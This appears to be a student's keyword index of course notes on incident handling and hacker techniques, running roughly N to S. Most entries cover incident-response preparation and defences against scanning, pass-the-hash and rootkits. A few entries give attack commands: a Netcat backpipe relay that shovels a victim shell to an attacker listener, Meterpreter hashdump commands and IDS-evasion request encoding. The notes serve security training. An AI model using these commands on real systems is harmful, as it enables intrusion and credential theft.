Use Netcat in client mode to connect to backdoor listener:
nc [listenIP [port]
You are logged in as the user that ran Net

Implement a client-to-client Netcat relay

First create a listener that the relay shovels the connection to
--On the outide (attackers machine), run
nc -l -p 4444
Netcat: Lab 3 42
On the victim machine, in the prompt with limited privileges make the client-to-client relay
cd
mknod backpipe p
nc 127.0.0.1 4444 0<backpipe | nc 127.0.0.1 2222 1>backpipe
Try it, and type "whoami" in the attacker window
 Keywords Book Page Remarks

Netcat can be configured to relay information from machine to machine to machine

- Redirect data through ports allowed firewalls
- Or use relays to make it harder to trace true originating point of an attack
Netcat: Relays 3 22 - Rather trivial, but set up Netcat

examples:
nc -l -p incoming_port | nc target_Server outgoing port
nc -l -p 1111 | nc endserver 2222
1.) Data transfer (moving files)
2.) Port scanning and vulnerability scanning
Netcat: Uses 3 15 3.) Making connections to open ports
4.) Backdoors
5.) Relays
netscan 5 23 Shows all listening UDP and TCP Ports and connections
netstat -nao shows PID
netstat 2 102 netstat -na shows which ports are in use.
netstat -nab shows EXE and DLLs used

netstat 5 23 Lists open sockets (PID, Port, Protocol, and when it was opened
Shows all active listening UDP and TCP Ports and connections
netstat (Linux) 2 104 netstat -nap shows listening ports, PIDs and program names
Is a free war-driving tool for Windows. It can be used to detect 802.11a/b/g interfaces and can tie in GPS data ( Noisy, it
NetStumbler 2 61 sends SSID-less probe requests and look for probe responses, therefore, cannot detect Aps that don't respond to such
requests!

Hidden malware can be Id'd by it's network usage:

--Strange ports/services pairs, client-client, server-server comms
Network Intelligence & --Security Onion: Network Forensic Distro
5 74
Forensics Network-level intelligence and forensics can help detect such behavior early
Auto-detection and throttling via network based IPS
--NetWitness, FireEye, Sourcefire, TippingPoint, ForeScout,
An attacker wants to understand the topology of the target network
Network Mapping 2 79-86 The layout of routers and hosts can show vulnerabilities
NMAP can be used for network mapping and port scanning

Preparation
- You could disable incoming ICMP echo requests messages
But your users couldn't ping you
- You could disable outgoing ICMP Time Exceeded messages
Network Mapping - - But then your users couldn't traceroute all the way to you
2 86, 87 Identification
Defenses
- IDS signatures looking for ping sweep or traceroutes
- Many false positives possible
Containment
--If you notice a frequent ping sweep you can temporarily block source address
--Mark such rules as temporary in a comment field, then purge them on a regular basis (such as monthly)
Erad, Recov: N/A
 Keywords Book Page Remarks

Used to determine network topology

--Internet connectivity: DMZ, perimeter networks
--Internal network (with access from modem or wireless access point)
Network Mapping: NMAP 2 81 The layout of routers and hosts can show vulnerabilities
NMAP can be used for network mapping and port scanning
--Used on both Windows and Linux
--Zenmap GUI lends itself to network mapping and visualization

Network Perimeter
1 54
Detection(Example) View Diagram
NeXpose 2 116 Commercial vulnerability scanner
Niksun 2 57 **Commercial war dialer
Does entire application layer interaction rebuilding from packet captures- Passive and Active Sniffing
Nikto 2 web server scanner. Looks for default material and well-known server problems
runs on unix and windows.
Nikto IDS. Application-level IDS evasion. Nikto morphs this request so that it doesn’t match any signatures. It supports ten
Nikto IDS Evasion 2 modes of IDS evasion. 9 application and 1 at transport.
Avoids this command in IDS:
Get /cgi-bin/broken.cgi http/1.0

supports web authentication (Basic or NTLM) - password guessing attack

'- grabs and stores any cookies received
Nikto Authen and - supports a proxy, with or without authentication
2 - SSL Support (using Open SSL for Unix or ActiveState's Perl/NetSSL for Windows)
Comms
-Extensible via user defined plugins written in Perl
- Mutation functionality. send requests using all combinations of user-defined directories,as well as, discovered directories.
can generate enormous amounts of traffic

-Auto update- updates its own code and grabs latest vulnerability checks
-attempts to determine "ok vs not found" messages for target
Nikto Features 2 -automatically searches for and identifies CGI directories.
-Looks for robots.txt and focuses on pages referred to by this file
-simple port scanner, does 3 way handshake and then determines if a web server is there
-app-level IDS evasion techniques included
URL Encoding - converts Http request into different representation, by changing ASCII characters into their hexadecimal
Nikto IDS 2 values and prepending them with a % character.
'- Get /%63%67%69%2d……./broken.cgi HTTP/1.0

Nmap sends the following four packets to each address in the target range:
ICMP Echo Request
TCP SYN to port 443
NMAP 2 83 TCP ACK to port 80 (if Nmap is running with UID 0)
ICMP Timestamp request
When running without UID 0, Nmap sends SYN packets to port 80 instead of ACK
By default NMAP sweeps each target address port before scanning it.
Nmap - OS
2 95-96
Fingerprinting
NMAP Active OS
2 96
Fingerprinting Attempts to determine the operating system of target by sending various packet types and measuring the response.
 Keywords Book Page Remarks
NMAP OS Fingerprinting 2 97 30 different methods are included in 2nd generation fingerprinting including, TCP ISN, TCP IP ID, ICMP IP ID, TCP initial
window size
NMAP Scan Types 2 94 NMAP allows for conducting numerous types of scans: Ping sweeps, ARP scans, Connect scans, SYN scans, FIN scans…
etc
Nmap Scan Types 2 93-94
NMAP-ACK Scanning 2 95 Blocks session initiations from the outside. Useful for mapping, but not for port scanning. Great for finding sensitive internal
system post exploitation
No free bugs 2 9 Movement started by researchers where they discussed a policy, in which they try to get paid for vulnerabilities they
discover.
nohup 3 20 The attacker can invoke this loop in the background by using the nohup command, as follows:
$ nohup ./listener.sh &

NT hash authentication is better, but not great

--Uppercase/lowercase are preserved (thankfully)
NT Hashes 4 19 --Password is hashed using MD4 to create 16 byte hash
--If the password is greater than 14 characters, no LANMAN hash is stored ( that's 15 or more characters)
For both LANMAN and NT hashes, no salts are used,
--You can precompute a dictionary of hashed passwords

Can be obtained by:

--Dump hashes from the Domain Controller (admin)
--Use Cain, Abel, or pwdump tools
--Fizzgigls fgdump, which shuts down AV tools
--Use Metasploit Meterpreter's hashdump script to pull them from memory or hashdump command to pull from the registry
Obtaining the Password
4 29, 30 *meterpreter> hashdump <----pulls from memory
Hashes (Cain)
*meterpreter>run hashdump<-------pulls from registry

If not the admin:

-Boot into other OS and copy the SAM
-Obtain a copy form c:\windows\repair or backup directory
-Obtain a copy from a tape or emergency repair disk
-Sniff passwords off the network using Cain's sniffers
--useful for LANMAN Challenge/Response, NTLMv1, NTLMv3 or Kerberos pre-auth

OWASP offers numerous useful items:

Open Web Application -Guide to Building Secure Web Apps and Web Services
Security Project 4 82 --Web app pen test framework
(OWASP) --WebGoat: A buggy web app, ready for you to test
--User input Validation code, including filters in PHP, Java, and as regular expressions
--ZAP: Web app vuln scanner
Great support for images, audio, video and flash-adobe files
OpenPuff 5 144 -multi-password support
-Plausible deniability
-Multiple rounds of encryption with different algorithms
Open-Source Information 2 30
see page
OpenStego 5 144 Embeds data and digital watermarks into images
 Keywords Book Page Remarks
OpenVAS 2 116 a fork of the previous free, open-source version of Nessus 2
Vulnerability scanner
OSSEC 5 73 File Integrity Checker
Runs on Linux, Mac OS X, and Windows

Other Unusual Items

1 75
(Windows Cheat Sheet)
The cheat sheets remind the system admin to look at the performance monitoring tool associated with the Task Manager.
P0F 2 passive sniffer that has 90% success rate.determines OS based off of TCP, UDP and ICMP headers. Estimates distance
based off of TTL. Everything behind the proxy looks likes the proxy.
Pacdoor 3 74 Tool used to attack WPAD and intercept traffic

For thwarting Windows reverse engineering of malicious code

Originally focused on compression
Packers 5 19
-Gives attacker more obscurity
UPX (most popular), Yoda, Themida, Exe32pack
Commercial ones as well (Thinstall, PECompact, PEBundle, etc.)
Packet Filtering 2 Looks at a single packet to make a filtering decision. Packets are forwarded through the device
packing 5 19 Compressing a bloated executable to make it smaller for distribution
Pluggable Authentication Modules (PAM)
PAM 4 41 Can link UNIX login to various systems:
-RADIUS, Kerberos, and more
Can enforce password complexity
Windows Credential Editor (WCE), improved version for Vista+
Pass the Hash: Tools 4 52 Modified SAMBA code allows mounting of file system (win/linux)
Metasploit psexec module (linux)
Mimikatz is an outstanding tool for extracting clear-text passwords from memory
Use the hashes to authenticate without cracking
A type of attack that allows the attacker to use the stolen hashes to authenticate to a target machine without cracking
Pass the Hash - Attacks 4 50 --Windows LSASS (LANMAN Challenge/Response, NTLMv1 and NTLMv2) authenticate from hashes

Preparation: Maintain control of hashes:

--Patch systems
--Harden machines
--use endpoint security suites
Pass the Hash - Defense 4 53 --block client to client connections, allow SMB to client from admin
--unique or pseudo-random local admin password for each system
Identification: Look for unusual admin activity on a machine:
--Configuration changes, and so on
--Look for unusual machine to machine connections
Containment, Eradication, Recovery:
--Change passwords immediately
Passive OS close all unused ports
2
Fingerprinting Def -utilize stateful packet filters and proxy firewalls
 Keywords Book Page Remarks
User password need to be protected against:
--Unauthorized disclosure, unauthorized modification, and unauthorized removal.
Password 4 5 Solution: Store only encrypted or hashed passwords
--Often called password representations, Windows store them locally in SAM database and remotely in Active Directory,
Modern Linux systems typically store them in the /etc/shadow file.

Windows password complexity enforced with Group Policy in AD

--password length is more important than complexity
Active Directory Users and Computers MMC snap-in:
Group Policy Object Policy\Computer Configuration\Windows Settings\Security Settings\Account Policies\
Password Complexity 4 33
Password Policy
--enable the "Passwords must meet complexity requirements of installed password filter" settings.
Local Security Policy snap-in from Administrative Tools (standalone)
--Security Settings\Account Policies\Password Policy
--enable the "Passwords must meet complexity requirements of installed password filter" setting.

Password Cracking for Recovering forgotten or unknown passwords

Good Purposes 4 14 Audit the strength of passwords
(Password Cracking) *Internal employees who are suspects could claim that you had their passwords and have therefore framed them
--Use l0phtcrack auditing mode!!

Start with a dictionary

Concatenate items (numbers, letters) to the dictionary words:
More advanced hybrid attacks:
Password Cracking:
4 13 --Shave characters off the dictionary term
Hybrid Attacks
--Make "leet" speak substitutions in dictionary terms
Sometimes referred to as word mangling
John the Ripper includes fantastic word-mangling rules for determining potential passwords

You can create encrypted/hashed password representations in advance

Password Cracking: Project Rainbow Crack provides software and free tables
4 22
Rainbow Tables The Free Rainbow Tables project provides free tables and lookup tools
Other projects crack other type of hashing/crypto algorithms
And this feature is supported in Cain, a tool with a great deal of functionality, including cracking Windows passwords
Password Spraying
2 138
Example See screenshot

Determining a password when you have only the password file with cipher text password representations:
--Find valid user ID
--Find encryption algorithm used
Password: Cracking 4 9 --Obtain encrypted password
--Create list of possible passwords
--Encrypt each password
--See if there is a match
Recovering forgotten or unknown passwords
Password: Cracking for Audit the strength of passwords
4 14
Good *Internal employees who are suspects could claim that you had their passwords and have therefore framed them
--Use l0phtcrack auditing mode!!
 Keywords Book Page Remarks
Dictionary attack: Using a word list
Password: Cracking Brute Force attack: Iterating through character sets
4 10
Methods Hybrid attack: A mix of the two, sometimes called word mangling
Tools such as: Cain and Abel, John the Ripper, Hashcat
Password: Guessing 4 6 Find valid user ID, create list of possible passwords, try typing in each password, if system allows you in, success if not, try
again. You can also use a script of automated tool to improve speed and accuracy.

Useful technique when lockout is a concern

Password: Spraying 4 7 --Try a small number of potential passwords against a large number of accounts on a large number of target machines
--Choose common words, such as city names, company names, product names, and local sports teams
--Choose names based on password reset intervals
-- An amazingly effective technique
Password: Unix/Linux 4 36 see page
Patents 1 180 Protect inventions and innovations
PaX 3 126 non-executable system stack, Linux, protects against buffer overflow
pedump 5 23 Dumps code associated with running process into executable file
Phishme 1 20 Phishme is an excellent way to create phishing campaigns and track the results

Focus on having direct access to a system. Think stolen laptop.

Common tools include:
Kon-boot: USB boot attack where any password is accepted as a correct password.
Physical Access Attacks 3 4, 5 Inception: Unlocking a powered on and locked computer via DMA firewire/Thunderbolt connections, great for gaining
access to systems with hard drive encryption.
Lanturtle+Responder: USB attck where a malicious USB Ethernet adapter causes a system to generate DNS request
and Responder can capture hashes
Rubber duckie: Are HID, look like mass storage but are actually automatic keyboards (really fast keyboards)

The key is to train users to protect their systems when they are not in their possession.
Physical Access Use ful-disk encryption:
3 6
Defenses Restrict access to USB ports:
Password Protect BIOS, and disable USB boot:
Disable LLMNR:
Ping sweeps 2 94 Send a variety of packets types (Including ICMP Echo Requests, but many others as well).
PingChat 5 128 reference
Poison Ivy 5 14 Remote-control backdoor GUI tool
Polymorphic code 4 64 Take binary instructions(compiled code), XOR it with random key, attack a decoder, Push DATA and the Pop into
REGISTER
pop 3 149 take it off the top of the stack
Port scanners are a must for any attacker's toolbox
Port Scanners 2 89 They help identify openings on a system and the type of system
Most Internet applications use TCP or UDP
87
Port Scanning 2
-104
 Keywords Book Page Remarks

Preparation
--Close all unused ports by shutting off services and applying filters
--Utilize stateful packet filters and/or proxy firewalls
Port Scanning - --Utilize an intrusion detection system
2 101
Defenses Identification:
--Several IDS signatures for port scans
-- Log analysis shows pesky connection attempts
Netstat, TCPView, WMIC
Cont, Erad, Recov: N/A
Positive Skew Analysis 1 139 Enterprise Wide IR Powershell
PowerBleed 3 65 Builds a bogus cert that has an MD5 hash collision with a trusted cert
PowerShell Empire - Exploits the strength of PowerShell to conduct enumeration across net
2 139
SMB Sessions --can amp domain trusts, group membership, portscan and conduct reverse DNS lookups
Kansa focuses on stacking like systems against each other to provide a ranked listing of processes, network connections,
Powershell Tools and configurations of systems
1 139
Enterprise-Wide IR This is part of statistical long-tail analysis (positive skew)
A multi-disciplinary team is best.
Security (computer and physical)
-Incident handlers(s), forensics analyst, malware analyst
Operation (system administrator)
Network management
Preparation - Building a Legal Counsel
1 30
Team Human Resources
Public affairs/Public relations
Disaster Recovery/Business Continuity Planning
Union representation (if you are a union shop)

Prepare a standard baseline for each type of system in the org.

Preparation - Checklists get an image for comparison during incident analysis phase
1 31
and Team Issues

Preparation - Command The command post needs to be identified in advance

1 32
Post Team -Should have multiple comms bands
Coordinate closely with help desks
-Help desk personnel are often the incident handler's initial eyes and ears
**system administrators and network administrators
Preparation - Cultivate - Involve system administrators in your team
1 38
Relationships *Trust your experienced admins' sense of things that "just aren't right"
-Encourage regular system backups by sys admins
-Invest in your helpdesk with regular training

team needs controlled access to computing resources.

Preparation - Getting --May or may not involve sysadmin
1 34 -Need passwords and crypto keys available
System Access
--be nice, always notify before logging into a system
 Keywords Book Page Remarks
Interface with law enforcement-
Develop interfaces enforcement agencies-
Preparation - Interface Know the types of cases that interest them-
1 25
with Law enforcement Join InfraGard, High Technology Crime Investigation Association(HTCIA), Electronic Crimes Task Force (ECTF)--
Report to federal/state/local. Starting at the bottom and working your way up is a good strategy.
Develop management support for an incident-handling capability,-
Preparation - -Monthly or quarterly reports
1 29 -Graphically illustrate an incident you faced.
Management Support
-Show jump-off points used in your network, Collect historical support
You may need to notify the public if PII or PHI is breached,-
--45 states have breach disclosure legislation--
--threat to public safety or substantial impact to 3rd party

reasons to notify law enforcement: benefit from criminal discovery and be a good corporate citizen
Preparation - Notifying
1 23 not notifying law enforcement--
Law Enforcement
-Control: There are suddenly two cases,-
-Different goals ( prosecution vs. quickly resuming business)
**Publicity, Risk of continued hacking, Risk of equipment seizure and/or interruption to business (while back ups are made)

Establish a policy for outside "peer" notification

Preparation - Peer --incidents involving remote computers belonging to Business partners and joint ventures
1 26
Notification **For VPN usage, include a warning banner
One of the most overlooked aspects of our security posture. Also, the most easily attacked--
Via targeted e-mail (spear phishing)--
Via calls (social engineering). Recurring training can be a big help,
Preparation - People 1 20 Annual training tends to be ineffective, Constant reinforcement, SANS Securing the Human.
You can also regularly test your users with social-engineering calls and phishing tests.
Caller ID spoofing is a good test to employ Phishing frameworks, such as sptoolkit and Phishme.

Establish a primary point of contact and an incident command communications center.

Preparation - POC and --be prepared for establish secured communications.
1 35
Resources **Get permission in advance to rapidly deploy resources ($$, etc.)
Establish an organizational approach to the incident handling.--
-Decide generally how you will handle the "big issues" upfront,--
-Maintain secrecy or notify law enforcement.--
Preparation - Policy 1 22 -Contain and clear or watch and learn,--
-Get management buy-in and signoff of your default practices.-
-Document any purposeful deviations from your standard practice when you opt to do so.
**Make these decisions before any incident occurs

Preparation - Reporting Provide an outlet to encourage reporting of suspicious activity

1 36
Facilities --reward employees for reporting and publish bulletins that outline finding
 Keywords Book Page Remarks
Remain calm,-Even a fairly mild incident tends to cause stress.--
-Do not hurry; mistakes can be very costly. Answer 5 W's and How?
- Notes, logs and other evidence are crucial.
Preparation - Take Notes 1 27 -Hand-written notes can be a big help,- never rip out pages
-Judges and juries resonate with the them,-
-The attacker cannot steal them from your machine or destroy them
**Include date/time, a recorder or camera may be very useful

Train all the time!! reduce stress through preparation

-Set up tools and techniques training
Preparation - Train the -Consider deploying an internal honeypot for analysis
1 37 -Stock some high-capacity drives and practice forensics imaging
Team
-(Advanced) Conduct war games
*Conduct a penetration test unannounced and see how your team responds

Get a duffle bag and keep it stocked with items for incident handling.
Preparation Don't steal from your own jump bag (Always have it ready to roll)
1 40 Fresh media for holding file system images
- Jump Bag
CDs, USBs, and an extra high-capacity hard drive
Create phone tree with established procedures
Preparation -Emergency - have a conference bridge number on standby
1 33 - Print and laminate contact info
Comms
**Test your call list
Preparation Overview 1 19 The goal of the Preparation phase is to get the team ready to handle incidents
procmemdump 5 23 Dumps the memory of a particular process chose by the Rekall user. Instead of looking through all of memory, the analysis
can focus on just this given process
Program Execution 3 100 SEE SLIDE

Application: (Web Surfing, Telnet, FTP)

Protocol Layering Transport Layer: (TCP or UDP)
3 47
Review Network Layer: (IP_
Data Link Layer: (Ethernet Firmware, MAC Address)
Physical Layer: ( Ethernet Card, Wire)
Flaws in these protocol parsers let the attackers get the privileges of the vulnerable program
-Often, these programs run with root or system privileges
-They can grab packets in promiscuous mode, and/or
Protocol Parser Buffer -They can attach to a port number less that 1024 on UNIX, and/or
3 137
Overflows -Because they involve system-level functionality
admin users sometimes run protocol parsers to look at delay captured data
-attackers can get admin privileges on the network admins machine

Protocol parsers are particular problems areas

Protocol Parsers -Grab data from the network and parse it for an application
3 136
Problems -The code breaking data down into components fields is often ripe with buffer overflow vulnerabilities

Proxy - Web App The proxy enables the attacker to edit the raw HTTP or HTTPS, including nonpersistant cookies
4 138 -Account Numbers, Balances, shopping cart price
Manipulation
ZAP Proxy, Burp Proxy, w3af, and Fiddler
 Keywords Book Page Remarks

sender makes a connection to the proxy

Proxy Firewalls 2 proxy makes a separate connection to the receiver
packets are not forwarded through the device
Packet header information is annihilated
psexec 4 52 Metasploit psexec module supports pass the hash
--powerful module for SMB infiltration
pslist 5 23 Lists running processes (PID, name and Parent ID)
pstree 5 23 See a full process tree for a memory image
Tunnels TCP through ICMP
Ptunnel 5 119 MD5-based challenge/response auth between client and proxy
Currently, no encryption between client and proxy
Consists of two components: the Ptunnel client and the Ptunnel proxy. The attacker configures the Ptunnel client to
Ptunnel: Features 5 120 listen on a given TCP port on the localhost interface of the client machine. In addition, the attacker must configure the
Ptunnel proxy which runs on an external machine, accessibile via ping packets from the Ptunnel client
Zombie machines that are only active for short periods
Pulsing Zombies 4 159 --launch attack then go dormant
-rotates between groups of zombies
push 3 149 means to throw the register onto the stack
Slurps social media in a geographic area.
Social media geolocation
Pushpin 2 31 --Flicker
--Twitter
--Picasa
Pushpin: Output 2 32 see screenshot
Qualys 2 116 Commercial service offered the features of as a Web-based scanning service
QUICK 5 127 Quick UDP Internet Connection
Use of multiplexed UDP connections for connections
Ransomware 2 10 bad guy take over a system and somehow blackmail the victim.
Recon: Web Based 2 50 Shodan, DNSStuff, tracert, traceroute, network-tools, securityspace
- all are able to research target sites, provide info about network/vulns
Recon:
2 35
Search Engine The easiest way to get information is to ask for it.

Two general types of attackers

--Script kiddies: Look for low-hanging fruit, and may skip this step
--Attackers out to get a particular site: This step is extremely important
Reconnaisance 2 16 DNS registration provides a wealth of open source info about a target
--used for social eng, war driving, scanning, etc.
Can also use a whois lookup to find out allocated IP blocks (18)
Search the target's websites for clues about their software/hardware, etc.
--Also look for information that can help social eng. (29)

- Ties together numerous different recon sources into on framework

- Currently more than 60 different recon modules
Recon-ng 2 43 - Most modules are free, some require a third-party API key
- Some modules can tell if any target organization has been compromised via third-party sites
- Uses the web interface for many sites to scrape results
Determined attackers use these tools to gain access to target environments without even using an exploit
 Keywords Book Page Remarks
Red Pill 4 78 The Red Pill looks for shifted Interrupt Descriptor Table
--helps ID the presence of VM
Using the TCP three way handshake, an attacker can bounce a flood from the zombie to the victim
Reflected DDoS Attacks 4 158 Zombie sends a SYN to legitimate site
Legit site sends a SYN/ACK to food the victim
Makes tracing the attack even more difficult
Make a similar-looking domain name
Registration Attack- DNS 3 88
Rekall 5 23 - 27 Rekall consists of numerous modules, each of which scours a Windows memory dump looking for specific artifacts

Rekall modules include:

imageinfo:shows the date and time the memory dump was captured
netstat: Lists open sockets (PID, Port, Protocol, and when it was opened)
pstree: See a full process tree for a memory image
Rekall Modules 5 23 pslist: Lists running processes (PID, name, and Parent PID)
dlllist: Lists the DLLs loaded by a process, as well as the command-line invocation of a process
netscan: Shows all listening UDP and TCP Ports and connections
filescan: Lists the files that each process had open
pedump: Dumps code associated with running process into executable file
modules: Lists loaded modules from the dump, including drivers and SYS files

Use Rekall's dlllist module to display a list of DLLS loaded by a process, as well as command-line invocation of a running
process:
Rekall: DLLs and [1] memimage.dd hh:mm:ss> dlllist pid=[pid_num]
5 27
Command Line Output is a similar to the following commands on a live Windows machine:
C:\> tasklist /m /fi "pid eq [pid]"
C:\> wmic process where processid=[pid] get commandline
Using Rekall's netstat module, we can display a list of active network connections at the time the memory dump was
Rekall: Viewing Network acquired:
5 25 [1] memimage.dd hh:mm:ss > netstat
Connections
Output is similar to the following command on a live Windows machine:
C:\> netstat -nao | find "ESTABLISHED"

Rekalls's pslist module displays a list of running processes at the time the image was acquired
Rekall: Viewing
Processes
5 26 [1] memimage.dd hh:mm:ss> pslist
Output is similar to the following command on a live Windows machine:
C:\> wmic process get name, parentprocessid, processid
Remove malware inserted by the attacker
Removing Malicious - Viruses, worms, backdoors, etc.
1 118 Rootkits require a complete wipe/rebuild
Software (Eradication)
**Sometimes vuln services were the entry point. Look to patch or remove services
Remux 2 100 scanning through multiple open proxies online
The goal of the Lesson Learned phase is to document what happened and improve our capabilities
Develop a follow-up report immediately after recovery
Report (Lesson Assign the tsk to the on-site team
1 127 Include incident forms from and Bring in all involved parties to review the draft
Learned)
Attempt to reach consensus and get sign off, if someone don't agree, have them submit and sign off on his own version of
the event
 Keywords Book Page Remarks

Tool designed to launch LLMNR attacks (dedicated to answerring stray LLMNR/NBT-NS/Proxy Requests).
Can also be launched against NBT-NS, DNS/MDNS attacks
Responder 3 71 Automatically launches a number of services to redirect victim systems to in order to harvest credentials
--HTTP, HTTPS, SQL Server, Kerberos, FTP, IMAP, SMTP, DNS, LDAP
Goal is to spoof a system, then be ready to intercept authentications on the fly.
Can also serve up malicious .exe files and force downgrade for LANMAN authentication
Responder: Capture 3 73 See screenshots
Responder: starting 3 72 See screenshots

Restore Operations
1 123 Decide when to restore operations. Try for an off-hours timeslot. It's easier to monitor carefully. Put final decision in the
(Recovery)
hands of the system owners. Provide your advice, but they make the final call. Document your advice in a signed memo.
Can be difficult to locate a clean backup, sometimes infections predate backup media
Restoring from Backups ---In many cases (rootkits especially), you will need to wipe/rebuild
1 117
(Eradication) ** Always use original media to reinstall, patch after

1.) On the internal system surfs the Internet asking for commands from the attacker's external machine.
2.) The attacker types in commands at the external machine on the Internet and sends the commands back to the victim
machine as HTTP responses.
3.) These commands are then executed on the internal network host
Reverse HTTP Shells 5 117
4.) The results are pushed out with the next web request.

Works through web proxies

--Uses HTTP GET command
--Even supports authenticating through a web proxy with static password!
router checks each incoming packet against its routing tables to see if the packet's source address is coming from an
Reverse-path forwarding 3
interface that the router would normally use to route packets to a destination
RIPEMD-160 2 13 file integrity checker
robots.txt 2 44 website file that instructs search bots exclude info archive

Rookits - User-Mode Cryptographic hashes of key system files stored in a safe place
5 60 -Tripwire, OSSEC, nCircle, Solidcore, AIDE
Defenses (Integrity)
--The Internet Strom Center has a free NSRL lookup tool
Rookits - User-Mode There are four categories of hiding tools: Process hiding, Network hiding, File hiding, and Event hiding
5 50
Hiding --processes are modified to not display attacker's actions
-Don't let attacker get root in the first place
Rookits: User-Mode -Harden and patch the system thoroughly
5 59 **Analysis of /bin/login by automated tool to look for embedded password
Defenses
-use rootkit detectors (not always accurate)
--use equivalent commands and compare results
When a rootkit runs on the victim machine, the rootkit executable first makes a copy of itself in the system32 directory. Then
Rootkit Hiding: In Action 5 54 in step 1 and 2, it creates two other files in the same directory: iexplore.dll and explorer.dll. Files that you might assume are
associated with the legitimate programs. In step 3 the rootkit executable injects the explorer.dll into running processes
names "explorer.exe"
Newer rootkits make hiding easy
No configuration necessary
Rootkit Hiding: Windows 5 53, 55 The attacker just loads it on the end system in a directory of the attackers choosing, and then runs it (typically with admin
privileges).
--All artifacts associated with a rootkit directory are automatically hidden
 Keywords Book Page Remarks
Rootkit Platforms 5 48
Rootkit: Avatar 5 68 See: Avatar Rootkit

Hides processes, connections, logged in users, and gives UID 0 privileges

Use file system function hooking
Replaces file inodes to redirect read functions to evil inodes
--For example, netsat read data from /proc/net/tcp
Rootkit: Fontanini 5 69
Simply replaces the inode read call to filter certain evil results
Works on Linux 3.0 and greater kernels
Install with the following commands:
--#make
--#ismod rootkit.ko

Don't allow attackers admin rights

Harden the box,patch, etc.
Rootkit: Kernel-Mode
Use a good security template
Defenses -
5 70 The Center for Internet Security (CIS), in conjunction with NSA, NIST, and others, has developed a set of templates for
(Configuration
Win, Lin, Solaris, HP-UX, Cisco Routers, and Oracle DBs
Lockdown)
They have scoring tools as well

Rootkit: Kernel-Mode Look for changes in critical system files

5 73 Tripwire, OSSEC, Ionx Data Sentinel
Defenses (Integrity)

Rootkit: Kernel-Mode Sophos Anti-Rootkit

5 72 McAfee Rootkit Detective
Detectors (Win)
Rootkit Revealer

The containment, eradication, and recovery steps for kernel-mode rootkit techniques involve the same techniques used for
user-mode root-kits
--Containment
Rootkit: Kernel-Mode ----Analyze other systems' changes made by discovered rootkits
Defenses: Contain, Erad, 5 75 --Eradication
Recov ----Wipe dirve, then reformat drive
----Reinstall OS, applications, and data
----Make sure to apply all patches
----Change all admin/root passwords on victim and related systems
--Recovery
----Monitor system very carefully

Rootkit: Linux/Unix Look for inconsistencies b/w system apps

5 71 Run a rootkit checker: Chkrootkit, RootkitHunter, OSSEC
Detection Tools
FALSE POSITIVE POSSIBLE!!!
A collection of tools that allow and attacker to:
--Keep backdoor access into a system (maintain access)
Rootkits 5 47 --Mask the fact the system is compromised
Accomplished by altering the operating system itself
**Either modify OS or modify the kernel
 Keywords Book Page Remarks

Rootkits: Altering Kernel

/dev/kmem holds a map of kernel memory on Linux
in Memory
5 62 --Windows (System Memory Map)
--Super User Control Kit (SUCKit) (Linux), FU (Windows)
--Difficult due to randomness of memory, can crash system
Instead of altering live kernel memory, attackers could overwrite kernel file on the hard drive
Rootkits: Changing On Linux, the file is vmlinuz
Kernel File on the Hard 5 63 On Windows kernel functionality is in the ntoskrnl.exe and win32k.sys files
Drive -Attacker must foil NTLDR integrity checks of these files
-Bolzano and FunLove viruses did this in 1999
Rather than modify every system application, these modify the kernel
56, 57, 58, --more thorough than creating malicious versions of all system apps
Rootkits: Kernel-Mode 5 59, 60, 61, --better control over system
62, 63, 64 --requires in-depth understanding of kernel, is specific to the kernel
*Alters system call table to tell user programs how to respond to calls

Linux kernel is designed to be expanded through loadable kernel modules

Windows kernel uses device drivers
Insert code into the kernel
Rootkits: Loadable
Can augment kernel capabilities
Kernel Modules and 5 61
Can overwrite existing kernel functionality
Device Drivers
Win 7 and later require mandatory device driver signing (Started wiith Windows Vista and included in all newer Windows
versions)
--Could steal signing keys (Stuxnet)
--Or, use Method 2, altering kernel memory
Rootkits: User-Mode The login, rshd, sshd, inetd, and tcpd services are modified
5 49
Linux --Attacker is given remote access to any of these services
Rootkits: User-Mode Debug priviledges allows DLL injection
5 54 - 58
Windows --Hook APIs to views of running processes, open ports, and the file system

Attacker can put legit-looking system in a virtual machine

Put whole OS in a virtual machine
Rootkits: Virtualization 5 64
Victim users are locked in a jail but they don’t know it
SubVert, Blue Pill
hardware-based rootkit called Vitriol for Intel VT-x technology
Rootkits: Where and Inject code that hooks API calls to hide the attacker on the system
5 52
What to Inject --Masks various running processes, files, registry keys, and network activity
Works on 2.6+ and 3.0+ Linux kernels, 32 and 64 bit support
Uses driver support/loadable kernel modules
Rooty 5 66 - uses insmod to insert the various rootkit components
Modifies the System Call Table
--Real time hiding from strace, lsmod
RPC scanning 2 94 Identifies which Remote Procedure Call services are offered by the target machine.
 Keywords Book Page Remarks

$ rcpclient -U [username] [WinIPaddr] establish a session

You have an rpcclient prompt with many commands available
- enumdomusers: List users
- enumalsgroups [domain]|[builtin]" List groups (stands for "enum alias groups")
rpcclient 2 142 - lsaenumsid: Show all users SIDs defined on the box
- lookupnames: [name]: Show SID associaled with user-or group name
- lookupsids [sid]: Show user name associated with SID
- srvinfo: Show OS type and version
The rpcclient man page lists hundreds of other commands
- Those listed here are the most useful and a lab covers them shortly
Rubber Duckie 3 5 Human Iinterface device, looks like a massage storage device (thumbdrive), but really and automatic keyboard.
SAINT 2 116 Commercial vulnerability scanner
Salt 4 20 A salt is a random number used to seed the crypto algorithm
Santy 2 42 worms use google searches to find vuln systems to spread to
sc (service control) 2 103 To disable a service permanently, type
sc config [service] start= disabled
Scanning 2 52 War Driving, War Dialing, and Network Scanning

Scanning - Network An attacker wants to understand the topology of the target network
2 79-86 The layout of routers and hosts can show vulnerabilities
Mapping
NMAP can be used for network mapping and port scanning
Scanning - Port
2 87-104
Scanning
Scanning - Vuln Scan 2 123 Test against a list of know exploits
Scaring people into believing their systems are compromised
Scareware 5 16 -They sometimes charge hundreds of dollare to "fix" a system
-Usually just clear the event logs
Scoopy 4 78 looks for shifted Interrupt, Local, and Global Descriptor Tables
ScreenShotter 3 54 MitMf tool that invokes HTML5 Canvas to take a screenshot of the browser
SCTP 5 127 Stream Control Transmission Protocol (SCTP)

Bishop Fox's SearchDiggity is a fantastic suite that includes Google Diggity, Bing Diggity, and other search capabilities
Search Engine Recon: - Malware Diggity, Data Loss Prevention Diggity, Flash Diggity
Automated Search 2 43 - Many of these "diggity" components require an API for the respective service
Engine - Sometimes, free APIs provide fewer results than the web interface
Recon-ng is another powerful automated search tool

limit what is accessible

--Use metatags to limit web features that are visible to web-bots
--robots.txt provides list of files/dirs for search robots to ignore
